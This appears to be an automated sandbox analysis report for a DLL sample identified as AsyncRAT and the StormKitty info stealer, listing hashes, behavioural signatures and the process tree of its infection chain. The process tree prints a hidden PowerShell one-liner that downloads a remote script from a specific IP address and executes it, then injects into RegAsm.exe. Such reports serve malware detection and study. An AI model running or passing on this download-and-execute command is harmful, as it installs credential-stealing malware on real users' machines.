Analysis
-
max time kernel
94s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2025 18:13
Static task
static1
Behavioral task
behavioral1
Sample
iviewers.dll
Resource
win7-20241010-en
General
-
Target
iviewers.dll
-
Size
88KB
-
MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8
-
SHA1
109e32187254b27e04ef18bbe1b48fad42bca841
-
SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68
-
SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599
-
SSDEEP
1536:L02ifPleVQ8zxlaSRslYzy26igsbuNdn4fuH1e6tsWy4cdlETcgS/iG:5iV4Qaxltsl/ggsCN3oBlQcgkiG
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/448-37-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 3108 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3108 powershell.exe -
Downloads MZ/PE file
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3108 set thread context of 448 3108 powershell.exe 88 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3108 powershell.exe 3108 powershell.exe 448 RegAsm.exe 448 RegAsm.exe 448 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 448 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 448 RegAsm.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 3680 wrote to memory of 1072 3680 regsvr32.exe 82 PID 3680 wrote to memory of 1072 3680 regsvr32.exe 82 PID 3680 wrote to memory of 1072 3680 regsvr32.exe 82 PID 1072 wrote to memory of 2816 1072 regsvr32.exe 83 PID 1072 wrote to memory of 2816 1072 regsvr32.exe 83 PID 1072 wrote to memory of 2816 1072 regsvr32.exe 83 PID 2816 wrote to memory of 3108 2816 cmd.exe 85 PID 2816 wrote to memory of 3108 2816 cmd.exe 85 PID 2816 wrote to memory of 3108 2816 cmd.exe 85 PID 3108 wrote to memory of 1848 3108 powershell.exe 86 PID 3108 wrote to memory of 1848 3108 powershell.exe 86 PID 3108 wrote to memory of 1848 3108 powershell.exe 86 PID 1848 wrote to memory of 404 1848 csc.exe 87 PID 1848 wrote to memory of 404 1848 csc.exe 87 PID 1848 wrote to memory of 404 1848 csc.exe 87 PID 3108 wrote to memory of 448 3108 powershell.exe 88 PID 3108 wrote to memory of 448 3108 powershell.exe 88 PID 3108 wrote to memory of 448 3108 powershell.exe 88 PID 3108 wrote to memory of 448 3108 powershell.exe 88 PID 3108 wrote to memory of 448 3108 powershell.exe 88 PID 3108 wrote to memory of 448 3108 powershell.exe 88 PID 3108 wrote to memory of 448 3108 powershell.exe 88 PID 3108 wrote to memory of 448 3108 powershell.exe 88
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\orpzoam5\orpzoam5.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8993.tmp" "c:\Users\Admin\AppData\Local\Temp\orpzoam5\CSC89407409A2F4C709F3F22FFD86B44EF.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:404
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:448
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD552ec06e112613aa23525eb9e7ec8c778
SHA12ab72865295c35140d4a631bb0a139c277cc179c
SHA256471cee1ccddc5b1f778cb14b3055cfcf73b0d672541ebff893c486f93156782d
SHA5122153aed665889fd007f1a31884ef0f55c2b5e105a5c7d9c20897b148bdca4f872142af9a9512f0ead0723395ff11d91ea932bb63ace0637e3c64cc79f45ea74a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD545c5fa9add623e32953cfb6b0fa8b086
SHA1047e78f1a35b6a0bdc217f4e397f0a0018d7677c
SHA256838603506b32559fcabf9b6a4f68a99c0d4388a51651d1c4a16d91ff6312ec66
SHA51234445e888dc87daf73a66ac91a93b5a7418e3f85306b74d86fee4b04dae4b93076970e37d6eb1498dabb12b7eec562249dbbe1fe0f99ddc527a60fcd4dd3c3f2
-
Filesize
652B
MD54b3c1737fd83afc5608df42f12509bfb
SHA15ed6ad23a59542c509bbf34b81b4d659cba6f0ae
SHA25635ef8ac5bb571b6b77d9e5db3b685c6a0cec36d6d530fbc9fa6e8f78854e3baa
SHA5125e937de8ed9a7b7689fb75f037fc5f9c591e1c1b6e78d6761c81fa028533b2d899d899d78d069d50ebd3a82fc57086caecf24d83421c8cf75034e53bc0c44f6b
-
Filesize
10KB
MD53fa79decff8805745cea8116d9bb2643
SHA192343c5fa2c768b964ae3a4e9136e5d7193e8558
SHA256e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c
SHA5125c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78
-
Filesize
204B
MD5b20661ec2146e13e9ccd5225a9245c27
SHA1e5ba7b0cbe5be3388fbd26f11346484353087535
SHA2569275190323e29a2131d45681765e98d427cc92da29546a8c8a4f6738817d1cbe
SHA5129a1c26d3cbd9f4fe7f6ce66c843c04b30023e83236540f39f6f45ad605cd5b3489aaa565ba22c240a3872388f0ea5a90abdaf53f410275aa305071407a6d6fe5